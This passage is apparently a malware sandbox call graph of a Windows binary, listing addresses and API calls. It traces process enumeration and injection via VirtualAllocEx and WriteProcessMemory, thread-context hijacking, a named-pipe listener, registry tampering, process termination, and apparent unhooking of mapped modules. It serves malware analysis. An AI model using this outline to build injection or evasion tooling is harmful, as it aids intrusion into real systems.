2e86a09d32a FreeEnvironmentStringsW 8112->8115 8116 2e86a09d1a0 WideCharToMultiByte 8113->8116 8114->8106 8123 2e86a09a6f4 8114->8123 8115->8114 8117 2e86a09d2d0 8116->8117 8117->8112 8118 2e86a09af2c 14 API calls 8117->8118 8119 2e86a09d2df 8118->8119 8120 2e86a09d309 8119->8120 8121 2e86a09d1a0 WideCharToMultiByte 8119->8121 8122 2e86a09b9f8 __free_lconv_num 13 API calls 8120->8122 8121->8120 8122->8112 8124 2e86a09a71b 8123->8124 8125 2e86a09b980 _set_errno_from_matherr 13 API calls 8124->8125 8135 2e86a09a750 8125->8135 8126 2e86a09a7bf 8127 2e86a09b9f8 __free_lconv_num 13 API calls 8126->8127 8128 2e86a09a6c0 8127->8128 8128->8110 8129 2e86a09b980 _set_errno_from_matherr 13 API calls 8129->8135 8130 2e86a09a7b0 8140 2e86a09a7fc 8130->8140 8131 2e86a09ac54 __std_exception_copy 30 API calls 8131->8135 8134 2e86a09a7e7 8138 2e86a09b860 _invalid_parameter_noinfo 17 API calls 8134->8138 8135->8126 8135->8129 8135->8130 8135->8131 8135->8134 8137 2e86a09b9f8 __free_lconv_num 13 API calls 8135->8137 8136 2e86a09b9f8 __free_lconv_num 13 API calls 8136->8126 8137->8135 8139 2e86a09a7f9 8138->8139 8144 2e86a09a7b8 8140->8144 8145 2e86a09a801 8140->8145 8141 2e86a09a82a 8143 2e86a09b9f8 __free_lconv_num 13 API calls 8141->8143 8142 2e86a09b9f8 __free_lconv_num 13 API calls 8142->8145 8143->8144 8144->8136 8145->8141 8145->8142 8870 2e86a092fa0 8871 2e86a092fc7 8870->8871 8872 2e86a093094 8871->8872 8873 2e86a092fe4 PdhGetCounterInfoW 8871->8873 8873->8872 8874 2e86a093006 GetProcessHeap HeapAlloc PdhGetCounterInfoW 8873->8874 8875 2e86a093080 GetProcessHeap HeapFree 8874->8875 8876 2e86a093038 StrCmpW 8874->8876 8875->8872 8876->8875 8878 2e86a09304d 8876->8878 8877 2e86a093558 12 API calls 8877->8878 8878->8875 8878->8877 8146 2e86a0a1ca0 8147 2e86a0a1cb1 CloseHandle 8146->8147 8148 2e86a0a1cb7 8146->8148 8147->8148 7552 2e86a092618 7553 2e86a092699 _invalid_parameter_noinfo 7552->7553 7554 2e86a0926fe GetFileType 7553->7554 7564 2e86a09288f 7553->7564 7555 2e86a092722 7554->7555 7556 2e86a09270c StrCpyW 7554->7556 7558 2e86a0919d8 4 API calls 7555->7558 7557 2e86a092731 7556->7557 7561 2e86a09273b 7557->7561 7563 2e86a0927e0 7557->7563 7558->7557 7559 2e86a093c70 StrCmpNIW 7559->7561 7560 2e86a093c70 StrCmpNIW 7560->7563 7561->7559 7562 2e86a09330c 4 API calls 7561->7562 7561->7564 7565 2e86a091cd4 2 API calls 7561->7565 7562->7561 7563->7560 7563->7564 7566 2e86a09330c 4 API calls 7563->7566 7567 2e86a091cd4 2 API calls 7563->7567 7565->7561 7566->7563 7567->7563 8579 2e86a092118 8580 2e86a092149 8579->8580 8581 2e86a09226e 8580->8581 8587 2e86a092239 8580->8587 8589 2e86a09216c 8580->8589 8582 2e86a092279 8581->8582 8583 2e86a0922e8 8581->8583 8596 2e86a0931c0 GetProcessHeap HeapAlloc 8582->8596 8585 2e86a0931c0 11 API calls 8583->8585 8583->8587 8585->8587 8586 2e86a0921b4 StrCmpNIW 8586->8589 8589->8586 8589->8587 8590 2e86a091c28 8589->8590 8591 2e86a091cb4 8590->8591 8592 2e86a091c5a GetProcessHeap HeapAlloc 8590->8592 8591->8589 8592->8591 8593 2e86a091c92 8592->8593 8594 2e86a091bf4 2 API calls 8593->8594 8595 2e86a091c9a GetProcessHeap HeapFree 8594->8595 8595->8591 8601 2e86a093213 8596->8601 8597 2e86a0932dd GetProcessHeap HeapFree 8597->8587 8598 2e86a0932d8 8598->8597 8599 2e86a09326a StrCmpNIW 8599->8601 8600 2e86a091c28 6 API calls 8600->8601 8601->8597 8601->8598 8601->8599 8601->8600 8602 2e86a09d11c GetCommandLineA GetCommandLineW 7568 2e86a098430 7571 2e86a099538 7568->7571 7570 2e86a098459 7572 2e86a09958e __std_exception_copy 7571->7572 7573 2e86a099559 7571->7573 7572->7570 7573->7572 7575 2e86a09ac54 7573->7575 7576 2e86a09ac61 7575->7576 7577 2e86a09ac6b 7575->7577 7576->7577 7581 2e86a09ac86 7576->7581 7578 2e86a09b960 _set_errno_from_matherr 13 API calls 7577->7578 7579 2e86a09ac72 7578->7579 7584 2e86a09b840 7579->7584 7582 2e86a09ac7e 7581->7582 7583 2e86a09b960 _set_errno_from_matherr 13 API calls 7581->7583 7582->7572 7583->7579 7587 2e86a09b790 7584->7587 7588 2e86a09b4c4 _set_errno_from_matherr 13 API calls 7587->7588 7589 2e86a09b7b5 7588->7589 7592 2e86a09b7c6 7589->7592 7595 2e86a09b860 IsProcessorFeaturePresent 7589->7595 7592->7582 7596 2e86a09b873 7595->7596 7599 2e86a09b62c 7596->7599 7600 2e86a09b666 _invalid_parameter_noinfo 7599->7600 7601 2e86a09b68e RtlCaptureContext RtlLookupFunctionEntry 7600->7601 7602 2e86a09b6c8 RtlVirtualUnwind 7601->7602 7603 2e86a09b6fe IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7601->7603 7602->7603 7606 2e86a09b750 _invalid_parameter_noinfo 7603->7606 7604 2e86a097d60 _handle_error 8 API calls 7605 2e86a09b76f GetCurrentProcess TerminateProcess 7604->7605 7606->7604 8149 2e86a0930b0 8150 2e86a0930e0 8149->8150 8151 2e86a093199 8150->8151 8152 2e86a0930fd PdhGetCounterInfoW 8150->8152 8152->8151 8153 2e86a09311b GetProcessHeap HeapAlloc PdhGetCounterInfoW 8152->8153 8154 2e86a093185 GetProcessHeap HeapFree 8153->8154 8155 2e86a09314d StrCmpW 8153->8155 8154->8151 8155->8154 8157 2e86a093162 8155->8157 8157->8154 8158 2e86a093558 StrCmpNW 8157->8158 8159 2e86a0935f6 8158->8159 8160 2e86a093586 StrStrW 8158->8160 8159->8157 8160->8159 8161 2e86a09359f StrToIntW 8160->8161 8161->8159 8162 2e86a0935c7 8161->8162 8162->8159 8168 2e86a091934 OpenProcess 8162->8168 8165 2e86a093c70 StrCmpNIW 8166 2e86a0935e8 8165->8166 8166->8159 8167 2e86a091bf4 2 API calls 8166->8167 8167->8159 8169 2e86a091968 K32GetModuleFileNameExW 8168->8169 8170 2e86a0919ba 8168->8170 8171 2e86a0919b1 CloseHandle 8169->8171 8172 2e86a091982 PathFindFileNameW lstrlenW 8169->8172 8170->8159 8170->8165 8171->8170 8172->8171 8173 2e86a0919a0 StrCpyW 8172->8173 8173->8171 8174 2e86a097eb0 8175 2e86a097eb9 __scrt_release_startup_lock 8174->8175 8177 2e86a097ebd 8175->8177 8178 2e86a09a500 8175->8178 8179 2e86a09a537 8178->8179 8180 2e86a09a520 8178->8180 8179->8177 8181 2e86a09a528 8180->8181 8182 2e86a09a53e 8180->8182 8183 2e86a09b960 _set_errno_from_matherr 13 API calls 8181->8183 8184 2e86a09cd58 43 API calls 8182->8184 8185 2e86a09a52d 8183->8185 8186 2e86a09a543 8184->8186 8187 2e86a09b840 _invalid_parameter_noinfo 30 API calls 8185->8187 8209 2e86a09c510 GetModuleFileNameW 8186->8209 8187->8179 8194 2e86a09a5b5 8196 2e86a09b960 _set_errno_from_matherr 13 API calls 8194->8196 8195 2e86a09a5cd 8197 2e86a09a2e0 33 API calls 8195->8197 8198 2e86a09a5ba 8196->8198 8202 2e86a09a5e9 8197->8202 8199 2e86a09b9f8 __free_lconv_num 13 API calls 8198->8199 8199->8179 8200 2e86a09a5ef 8201 2e86a09b9f8 __free_lconv_num 13 API calls 8200->8201 8201->8179 8202->8200 8203 2e86a09a634 8202->8203 8204 2e86a09a61b 8202->8204 8207 2e86a09b9f8 __free_lconv_num 13 API calls 8203->8207 8205 2e86a09b9f8 __free_lconv_num 13 API calls 8204->8205 8206 2e86a09a624 8205->8206 8208 2e86a09b9f8 __free_lconv_num 13 API calls 8206->8208 8207->8200 8208->8179 8210 2e86a09c556 GetLastError 8209->8210 8211 2e86a09c56a 8209->8211 8233 2e86a09b8f0 8210->8233 8213 2e86a09ad0c 33 API calls 8211->8213 8215 2e86a09c598 8213->8215 8214 2e86a09c563 8216 2e86a097d60 _handle_error 8 API calls 8214->8216 8220 2e86a09c5a9 8215->8220 8238 2e86a09d614 8215->8238 8219 2e86a09a55a 8216->8219 8221 2e86a09a2e0 8219->8221 8241 2e86a09c3fc 8220->8241 8223 2e86a09a31e 8221->8223 8225 2e86a09a384 8223->8225 8255 2e86a09d108 8223->8255 8224 2e86a09a473 8227 2e86a09a4a0 8224->8227 8225->8224 8226 2e86a09d108 33 API calls 8225->8226 8226->8225 8228 2e86a09a4b8 8227->8228 8229 2e86a09a4f0 8227->8229 8228->8229 8230 2e86a09b980 _set_errno_from_matherr 13 API calls 8228->8230 8229->8194 8229->8195 8231 2e86a09a4e6 8230->8231 8232 2e86a09b9f8 __free_lconv_num 13 API calls 8231->8232 8232->8229 8234 2e86a09b4c4 _set_errno_from_matherr 13 API calls 8233->8234 8235 2e86a09b901 8234->8235 8236 2e86a09b4c4 _set_errno_from_matherr 13 API calls 8235->8236 8237 2e86a09b91a 8236->8237 8237->8214 8239 2e86a09d3ec try_get_function 5 API calls 8238->8239 8240 2e86a09d634 8239->8240 8240->8220 8242 2e86a09c439 8241->8242 8244 2e86a09c420 8241->8244 8243 2e86a09c43e 8242->8243 8245 2e86a09d1a0 WideCharToMultiByte 8242->8245 8243->8244 8247 2e86a09b960 _set_errno_from_matherr 13 API calls 8243->8247 8244->8214 8246 2e86a09c491 8245->8246 8246->8243 8248 2e86a09c498 GetLastError 8246->8248 8249 2e86a09c4c1 8246->8249 8247->8244 8250 2e86a09b8f0 13 API calls 8248->8250 8251 2e86a09d1a0 WideCharToMultiByte 8249->8251 8252 2e86a09c4a5 8250->8252 8253 2e86a09c4e8 8251->8253 8254 2e86a09b960 _set_errno_from_matherr 13 API calls 8252->8254 8253->8244 8253->8248 8254->8244 8256 2e86a09d090 8255->8256 8257 2e86a09ad0c 33 API calls 8256->8257 8258 2e86a09d0b4 8257->8258 8258->8223 8259 2e86a0a16ab 8260 2e86a0a1950 8259->8260 8261 2e86a0a16eb 8259->8261 8264 2e86a0a2230 _log10_special 22 API calls 8260->8264 8266 2e86a0a1946 8260->8266 8261->8260 8262 2e86a0a171f 8261->8262 8263 2e86a0a1932 8261->8263 8267 2e86a0a2230 8263->8267 8264->8266 8270 2e86a0a2250 8267->8270 8271 2e86a0a226a 8270->8271 8272 2e86a0a224b 8271->8272 8274 2e86a0a2094 8271->8274 8272->8266 8275 2e86a0a20d4 _handle_error 8274->8275 8276 2e86a0a2140 _handle_error 8275->8276 8285 2e86a0a2350 8275->8285 8278 2e86a0a217d 8276->8278 8279 2e86a0a214d 8276->8279 8292 2e86a0a2688 8278->8292 8288 2e86a0a1f70 8279->8288 8282 2e86a0a217b _handle_error 8283 2e86a097d60 _handle_error 8 API calls 8282->8283 8284 2e86a0a21a5 8283->8284 8284->8272 8298 2e86a0a2378 8285->8298 8289 2e86a0a1fb4 _handle_error 8288->8289 8290 2e86a0a1fc9 8289->8290 8291 2e86a0a2688 _set_errno_from_matherr 13 API calls 8289->8291 8290->8282 8291->8290 8293 2e86a0a2691 8292->8293 8294 2e86a0a26a6 8292->8294 8295 2e86a0a269e 8293->8295 8297 2e86a09b960 _set_errno_from_matherr 13 API calls 8293->8297 8296 2e86a09b960 _set_errno_from_matherr 13 API calls 8294->8296 8295->8282 8296->8295 8297->8295 8299 2e86a0a23b7 _raise_exc _clrfp 8298->8299 8300 2e86a0a25cc RaiseException 8299->8300 8301 2e86a0a2372 8300->8301 8301->8276 7196 2e86a09dba8 7207 2e86a09aebc EnterCriticalSection 7196->7207 7198 2e86a09dbb8 7199 2e86a09fccc 31 API calls 7198->7199 7200 2e86a09dbc1 7199->7200 7201 2e86a09dbcf 7200->7201 7202 2e86a09d9ac 33 API calls 7200->7202 7203 2e86a09af10 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 7201->7203 7204 2e86a09dbca 7202->7204 7205 2e86a09dbdb 7203->7205 7206 2e86a09da9c GetStdHandle GetFileType 7204->7206 7206->7201 8302 2e86a095cac 8303 2e86a095cb3 8302->8303 8304 2e86a095ce0 VirtualProtect 8303->8304 8306 2e86a095bf0 8303->8306 8305 2e86a095d09 GetLastError 8304->8305 8304->8306 8305->8306 8307 2e86a0a2aaf 8308 2e86a0a2b32 8307->8308 8309 2e86a0a2ac7 8307->8309 8309->8308 8315 2e86a09977c 8309->8315 8312 2e86a09977c 42 API calls 8313 2e86a0a2b29 8312->8313 8321 2e86a09ac20 8313->8321 8326 2e86a099798 8315->8326 8318 2e86a09978a 8318->8312 8319 2e86a09acb4 33 API calls 8320 2e86a099794 8319->8320 8322 2e86a09b348 33 API calls 8321->8322 8324 2e86a09ac29 8322->8324 8323 2e86a09acb4 33 API calls 8325 2e86a09ac3f 8323->8325 8324->8323 8327 2e86a099785 8326->8327 8328 2e86a0997b7 GetLastError 8326->8328 8327->8318 8327->8319 8338 2e86a099b10 8328->8338 8339 2e86a099930 __vcrt_InitializeCriticalSectionEx 5 API calls 8338->8339 8340 2e86a099b37 TlsGetValue 8339->8340 8342 2e86a09aaac 8345 2e86a09a878 8342->8345 8352 2e86a09a840 8345->8352 8350 2e86a09a7fc 13 API calls 8351 2e86a09a8a0 8350->8351 8353 2e86a09a850 8352->8353 8354 2e86a09a855 8352->8354 8355 2e86a09a7fc 13 API calls 8353->8355 8356 2e86a09a85c 8354->8356 8355->8354 8357 2e86a09a871 8356->8357 8358 2e86a09a86c 8356->8358 8357->8350 8359 2e86a09a7fc 13 API calls 8358->8359 8359->8357 8883 2e86a0a2bc2 8884 2e86a0a2bd1 8883->8884 8885 2e86a0a2bdb 8883->8885 8887 2e86a09af10 LeaveCriticalSection 8884->8887 8360 2e86a0960c3 8361 2e86a0960d0 8360->8361 8362 2e86a0960dc GetThreadContext 8361->8362 8366 2e86a09623a 8361->8366 8363 2e86a096102 8362->8363 8362->8366 8363->8366 8371 2e86a096129 8363->8371 8364 2e86a096261 VirtualProtect FlushInstructionCache 8364->8366 8365 2e86a09631e 8367 2e86a09633e 8365->8367 8378 2e86a094800 8365->8378 8366->8364 8366->8365 8382 2e86a095210 GetCurrentProcess 8367->8382 8369 2e86a0961ad 8371->8369 8372 2e86a096186 SetThreadContext 8371->8372 8372->8369 8373 2e86a096397 8376 2e86a097d60 _handle_error 8 API calls 8373->8376 8374 2e86a096357 ResumeThread 8375 2e86a096343 8374->8375 8375->8373 8375->8374 8377 2e86a0963df 8376->8377 8380 2e86a09481c 8378->8380 8379 2e86a09487f 8379->8367 8380->8379 8381 2e86a094832 VirtualFree 8380->8381 8381->8380 8383 2e86a09522c 8382->8383 8384 2e86a095273 8383->8384 8385 2e86a095242 VirtualProtect FlushInstructionCache 8383->8385 8384->8375 8385->8383 8603 2e86a09d940 8604 2e86a09d979 8603->8604 8605 2e86a09d94a 8603->8605 8605->8604 8606 2e86a09d95f FreeLibrary 8605->8606 8606->8605 8607 2e86a092344 GetProcessIdOfThread GetCurrentProcessId 8608 2e86a0923ea 8607->8608 8609 2e86a09236f CreateFileW 8607->8609 8609->8608 8610 2e86a0923a3 WriteFile ReadFile CloseHandle 8609->8610 8610->8608 8611 2e86a09ab44 8612 2e86a09b9f8 __free_lconv_num 13 API calls 8611->8612 8613 2e86a09ab54 8612->8613 8614 2e86a09b9f8 __free_lconv_num 13 API calls 8613->8614 8615 2e86a09ab68 8614->8615 8616 2e86a09b9f8 __free_lconv_num 13 API calls 8615->8616 8617 2e86a09ab7c 8616->8617 8618 2e86a09b9f8 __free_lconv_num 13 API calls 8617->8618 8619 2e86a09ab90 8618->8619 7180 140002cb8 7181 140002cc5 7180->7181 7183 140002ce5 ConnectNamedPipe 7181->7183 7184 140002cda Sleep 7181->7184 7189 1400022fc AllocateAndInitializeSid 7181->7189 7185 140002cf4 ReadFile 7183->7185 7186 140002d29 Sleep 7183->7186 7184->7181 7187 140002d34 DisconnectNamedPipe 7185->7187 7188 140002d17 7185->7188 7186->7187 7187->7183 7188->7187 7190 140002417 7189->7190 7191 140002359 SetEntriesInAclW 7189->7191 7190->7181 7191->7190 7192 14000239d LocalAlloc 7191->7192 7192->7190 7193 1400023b1 InitializeSecurityDescriptor 7192->7193 7193->7190 7194 1400023c1 SetSecurityDescriptorDacl 7193->7194 7194->7190 7195 1400023d8 CreateNamedPipeW 7194->7195 7195->7190 8620 2e86a09a13b 8621 2e86a09ac20 33 API calls 8620->8621 8622 2e86a09a140 8621->8622 7208 14000363c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7209 140003692 K32EnumProcesses 7208->7209 7210 1400036ef SleepEx 7209->7210 7211 1400036a7 7209->7211 7210->7209 7211->7210 7213 140003198 7211->7213 7214 1400031d1 7213->7214 7215 1400031a9 7213->7215 7214->7211 7219 140001854 OpenProcess 7215->7219 7218 140001854 31 API calls 7218->7214 7220 140001cbe 7219->7220 7221 14000189f IsWow64Process 7219->7221 7220->7218 7222 1400018b7 CloseHandle 7221->7222 7222->7220 7224 1400018e0 7222->7224 7224->7220 7225 14000191c OpenProcess 7224->7225 7225->7220 7226 140001938 OpenProcess 7225->7226 7227 1400019f1 NtQueryInformationProcess 7226->7227 7228 140001957 K32GetModuleFileNameExW 7226->7228 7231 140001cb5 CloseHandle 7227->7231 7232 140001a16 7227->7232 7229 1400019a0 CloseHandle 7228->7229 7230 140001970 PathFindFileNameW lstrlenW 7228->7230 7229->7227 7234 1400019ae 7229->7234 7230->7229 7233 14000198d StrCpyW 7230->7233 7231->7220 7232->7231 7235 140001a20 OpenProcessToken 7232->7235 7233->7229 7234->7227 7237 1400019cd StrCmpIW 7234->7237 7235->7231 7236 140001a3e GetTokenInformation 7235->7236 7238 140001ae1 7236->7238 7239 140001a66 GetLastError 7236->7239 7237->7231 7237->7234 7241 140001ae8 CloseHandle 7238->7241 7239->7238 7240 140001a71 LocalAlloc 7239->7240 7240->7238 7242 140001a87 GetTokenInformation 7240->7242 7241->7231 7246 140001afc 7241->7246 7243 140001acf 7242->7243 7244 140001aaf GetSidSubAuthorityCount GetSidSubAuthority 7242->7244 7245 140001ad6 LocalFree 7243->7245 7244->7245 7245->7241 7246->7231 7247 140001b8c StrStrA 7246->7247 7248 140001bb5 7246->7248 7247->7246 7249 140001bba 7247->7249 7248->7231 7249->7231 7250 140001be5 VirtualAllocEx 7249->7250 7250->7231 7251 140001c14 WriteProcessMemory 7250->7251 7251->7231 7252 140001c33 7251->7252 7260 140002c04 7252->7260 7254 140001c53 7254->7231 7255 140001c61 WaitForSingleObject 7254->7255 7256 140001caa CloseHandle 7255->7256 7257 140001c70 GetExitCodeThread 7255->7257 7256->7231 7258 140001c86 7257->7258 7259 140001c8f VirtualFreeEx 7257->7259 7258->7259 7259->7256 7263 1400020b8 GetModuleHandleA 7260->7263 7264 1400020e1 7263->7264 7265 1400020d8 GetProcAddress 7263->7265 7265->7264 8623 2e86a097f3c 8625 2e86a097f60 __scrt_release_startup_lock 8623->8625 8624 2e86a099eb9 8625->8624 8626 2e86a09b4c4 _set_errno_from_matherr 13 API calls 8625->8626 8627 2e86a099ee2 8626->8627 7277 140002d40 7280 140002d54 7277->7280 7325 140002a14 7280->7325 7283 140002a14 14 API calls 7284 140002d7c GetCurrentProcessId OpenProcess 7283->7284 7285 140002d9c OpenProcessToken 7284->7285 7286 140002e0e RegOpenKeyExW 7284->7286 7287 140002e05 CloseHandle 7285->7287 7288 140002db0 LookupPrivilegeValueW 7285->7288 7289 140002d49 ExitProcess 7286->7289 7290 140002e3f RegQueryValueExW 7286->7290 7287->7286 7288->7287 7291 140002dc7 AdjustTokenPrivileges 7288->7291 7290->7289 7292 140002e6f RegQueryValueExW 7290->7292 7291->7287 7293 140002dff GetLastError 7291->7293 7292->7289 7294 140002e9f GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW 7292->7294 7293->7287 7294->7289 7295 140002f11 RegQueryValueExW 7294->7295 7295->7289 7296 140002f41 RegCloseKey GetCurrentProcessId 7295->7296 7339 140001ff8 GetProcessHeap HeapAlloc 7296->7339 7298 140002f58 RegCreateKeyExW 7299 140003052 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 7298->7299 7300 140002f95 ConvertStringSecurityDescriptorToSecurityDescriptorW 7298->7300 7303 140001508 50 API calls 7299->7303 7301 140002fd7 RegCreateKeyExW 7300->7301 7302 140002fbd RegSetKeySecurity LocalFree 7300->7302 7304 140003011 GetCurrentProcessId RegSetValueExW RegCloseKey 7301->7304 7305 140003048 RegCloseKey 7301->7305 7302->7301 7306 1400030dc 7303->7306 7304->7305 7305->7299 7307 1400030e8 ShellExecuteW 7306->7307 7308 14000311a 7306->7308 7307->7307 7307->7308 7309 140001480 6 API calls 7308->7309 7310 140003122 7309->7310 7311 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 7310->7311 7312 14000312b 7311->7312 7313 140001480 6 API calls 7312->7313 7314 140003134 7313->7314 7315 140001480 6 API calls 7314->7315 7316 14000313d 7315->7316 7317 140001480 6 API calls 7316->7317 7318 140003146 7317->7318 7319 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 7318->7319 7320 14000314f 7319->7320 7321 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 7320->7321 7322 140003158 7321->7322 7323 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 7322->7323 7324 140003161 GetProcessHeap HeapFree SleepEx 7323->7324 7324->7289 7326 140002be7 7325->7326 7327 140002a1d StrCpyW StrCatW GetModuleHandleW 7325->7327 7326->7283 7327->7326 7328 140002a6e GetCurrentProcess K32GetModuleInformation 7327->7328 7329 140002bde FreeLibrary 7328->7329 7330 140002a9e CreateFileW 7328->7330 7329->7326 7330->7329 7331 140002ad3 CreateFileMappingW 7330->7331 7332 140002bd5 CloseHandle 7331->7332 7333 140002afc MapViewOfFile 7331->7333 7332->7329 7334 140002bcc CloseHandle 7333->7334 7335 140002b1f 7333->7335 7334->7332 7335->7334 7336 140002b38 lstrcmpiA 7335->7336 7338 140002b76 7335->7338 7336->7335 7337 140002b78 VirtualProtect VirtualProtect 7336->7337 7337->7334 7338->7334 7345 140001cdc GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 7339->7345 7341 140002091 GetProcessHeap HeapFree 7342 14000203c 7342->7341 7343 14000205d OpenProcess 7342->7343 7343->7342 7344 140002073 TerminateProcess CloseHandle 7343->7344 7344->7342 7346 140001d69 7345->7346 7347 140001e3c GetProcessHeap HeapFree GetProcessHeap RtlFreeHeap 7345->7347 7346->7347 7348 140001d7e OpenProcess 7346->7348 7350 140001e27 CloseHandle 7346->7350 7351 140001dd5 ReadProcessMemory 7346->7351 7347->7342 7348->7346 7349 140001d9b K32EnumProcessModulesEx 7348->7349 7349->7346 7349->7350 7350->7346 7352 140001df8 7351->7352 7352->7346 7352->7350 7352->7351 7607 2e86a097c50 7608 2e86a097c71 7607->7608 7609 2e86a097c6c 7607->7609 7611 2e86a097d80 7609->7611 7612 2e86a097da3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7611->7612 7613 2e86a097e17 7611->7613 7612->7613 7613->7608 8628 2e86a09a150 8629 2e86a09a1b7 8628->8629 8630 2e86a09a16d GetModuleHandleW 8628->8630 8643 2e86a09a048 8629->8643 8630->8629 8634 2e86a09a17a 8630->8634 8634->8629 8638 2e86a09a258 GetModuleHandleExW 8634->8638 8639 2e86a09a295 8638->8639 8640 2e86a09a27e GetProcAddress 8638->8640 8641 2e86a09a2a7 FreeLibrary 8639->8641 8642 2e86a09a2ad 8639->8642 8640->8639 8641->8642 8642->8629 8657 2e86a09aebc EnterCriticalSection 8643->8657 8665 2e86a09bd50 8666 2e86a09bd76 8665->8666 8675 2e86a09bd8c 8665->8675 8667 2e86a09b960 _set_errno_from_matherr 13 API calls 8666->8667 8668 2e86a09bd7b 8667->8668 8670 2e86a09b840 _invalid_parameter_noinfo 30 API calls 8668->8670 8669 2e86a09bdf9 8672 2e86a09a4a0 13 API calls 8669->8672 8671 2e86a09bd85 8670->8671 8678 2e86a09be6c 8672->8678 8673 2e86a09bee1 8676 2e86a09b9f8 __free_lconv_num 13 API calls 8673->8676 8675->8669 8677 2e86a09bdec 8675->8677 8686 2e86a09bf5c 8675->8686 8676->8677 8679 2e86a09bf22 8677->8679 8680 2e86a09b9f8 __free_lconv_num 13 API calls 8677->8680 8678->8673 8683 2e86a09bf44 8678->8683 8708 2e86a09ef30 8678->8708 8681 2e86a09b9f8 __free_lconv_num 13 API calls 8679->8681 8680->8677 8681->8671 8684 2e86a09b860 _invalid_parameter_noinfo 17 API calls 8683->8684 8685 2e86a09bf58 8684->8685 8687 2e86a09bf8a 8686->8687 8687->8687 8688 2e86a09b980 _set_errno_from_matherr 13 API calls 8687->8688 8689 2e86a09bfd5 8688->8689 8690 2e86a09ef30 30 API calls 8689->8690 8691 2e86a09c00b 8690->8691 8692 2e86a09b860 _invalid_parameter_noinfo 17 API calls 8691->8692 8693 2e86a09c0e2 8692->8693 8694 2e86a09ad0c 33 API calls 8693->8694 8695 2e86a09c1bf 8694->8695 8696 2e86a09d614 5 API calls 8695->8696 8697 2e86a09c1ed 8696->8697 8717 2e86a09ba4c 8697->8717 8700 2e86a09c270 8701 2e86a09ad0c 33 API calls 8700->8701 8702 2e86a09c2a3 8701->8702 8703 2e86a09d614 5 API calls 8702->8703 8704 2e86a09c2cb 8703->8704 8739 2e86a09bbc4 8704->8739 8707 2e86a09bf5c 38 API calls 8712 2e86a09ef48 8708->8712 8709 2e86a09ef4d 8710 2e86a09ef63 8709->8710 8711 2e86a09b960 _set_errno_from_matherr 13 API calls 8709->8711 8710->8678 8713 2e86a09ef57 8711->8713 8712->8709 8712->8710 8715 2e86a09ef92 8712->8715 8714 2e86a09b840 _invalid_parameter_noinfo 30 API calls 8713->8714 8714->8710 8715->8710 8716 2e86a09b960 _set_errno_from_matherr 13 API calls 8715->8716 8716->8713 8718 2e86a09ba97 8717->8718 8719 2e86a09ba75 8717->8719 8720 2e86a09baf0 8718->8720 8721 2e86a09ba9b 8718->8721 8723 2e86a09b9f8 __free_lconv_num 13 API calls 8719->8723 8730 2e86a09ba83 FindFirstFileExW 8719->8730 8722 2e86a09d144 MultiByteToWideChar 8720->8722 8724 2e86a09baaf 8721->8724 8726 2e86a09b9f8 __free_lconv_num 13 API calls 8721->8726 8721->8730 8733 2e86a09bb0b 8722->8733 8723->8730 8727 2e86a09af2c 14 API calls 8724->8727 8725 2e86a09bb12 GetLastError 8728 2e86a09b8f0 13 API calls 8725->8728 8726->8724 8727->8730 8731 2e86a09bb1f 8728->8731 8729 2e86a09bb4b 8729->8730 8734 2e86a09d144 MultiByteToWideChar 8729->8734 8730->8700 8736 2e86a09b960 _set_errno_from_matherr 13 API calls 8731->8736 8732 2e86a09bb3f 8738 2e86a09af2c 14 API calls 8732->8738 8733->8725 8733->8729 8733->8732 8737 2e86a09b9f8 __free_lconv_num 13 API calls 8733->8737 8735 2e86a09bb93 8734->8735 8735->8725 8735->8730 8736->8730 8737->8732 8738->8729 8740 2e86a09bc0f 8739->8740 8741 2e86a09bbed 8739->8741 8743 2e86a09bc14 8740->8743 8744 2e86a09bc68 8740->8744 8742 2e86a09bbfb 8741->8742 8745 2e86a09b9f8 __free_lconv_num 13 API calls 8741->8745 8742->8707 8743->8742 8747 2e86a09bc28 8743->8747 8749 2e86a09b9f8 __free_lconv_num 13 API calls 8743->8749 8746 2e86a09d1a0 WideCharToMultiByte 8744->8746 8745->8742 8754 2e86a09bc8c 8746->8754 8750 2e86a09af2c 14 API calls 8747->8750 8748 2e86a09bc93 GetLastError 8751 2e86a09b8f0 13 API calls 8748->8751 8749->8747 8750->8742 8753 2e86a09bca0 8751->8753 8752 2e86a09d1a0 WideCharToMultiByte 8756 2e86a09bd1f 8752->8756 8757 2e86a09b960 _set_errno_from_matherr 13 API calls 8753->8757 8754->8748 8758 2e86a09b9f8 __free_lconv_num 13 API calls 8754->8758 8759 2e86a09bcce 8754->8759 8760 2e86a09bcc3 8754->8760 8755 2e86a09af2c 14 API calls 8755->8759 8756->8742 8756->8748 8757->8742 8758->8760 8759->8742 8759->8752 8760->8755 7614 2e86a095654 7615 2e86a09565a 7614->7615 7626 2e86a097c90 7615->7626 7620 2e86a095757 _invalid_parameter_noinfo 7622 2e86a0958dd 7620->7622 7624 2e86a0956be 7620->7624 7639 2e86a097860 7620->7639 7621 2e86a0959db 7622->7621 7623 2e86a095a57 VirtualProtect 7622->7623 7623->7624 7625 2e86a095a83 GetLastError 7623->7625 7625->7624 7629 2e86a097c9b 7626->7629 7627 2e86a09569d 7627->7624 7635 2e86a0940e0 7627->7635 7628 2e86a099e44 _set_errno_from_matherr 2 API calls 7628->7629 7629->7627 7629->7628 7630 2e86a097cba 7629->7630 7631 2e86a097cc5 7630->7631 7645 2e86a0984bc 7630->7645 7649 2e86a0984dc 7631->7649 7636 2e86a0940fd 7635->7636 7638 2e86a09416c _invalid_parameter_noinfo 7636->7638 7658 2e86a094350 7636->7658 7638->7620 7640 2e86a0978a7 7639->7640 7683 2e86a097630 7640->7683 7643 2e86a097d60 _handle_error 8 API calls 7644 2e86a0978d1 7643->7644 7644->7620 7646 2e86a0984ca std::bad_alloc::bad_alloc 7645->7646 7653 2e86a0995f0 7646->7653 7648 2e86a0984db 7650 2e86a0984ea std::bad_alloc::bad_alloc 7649->7650 7651 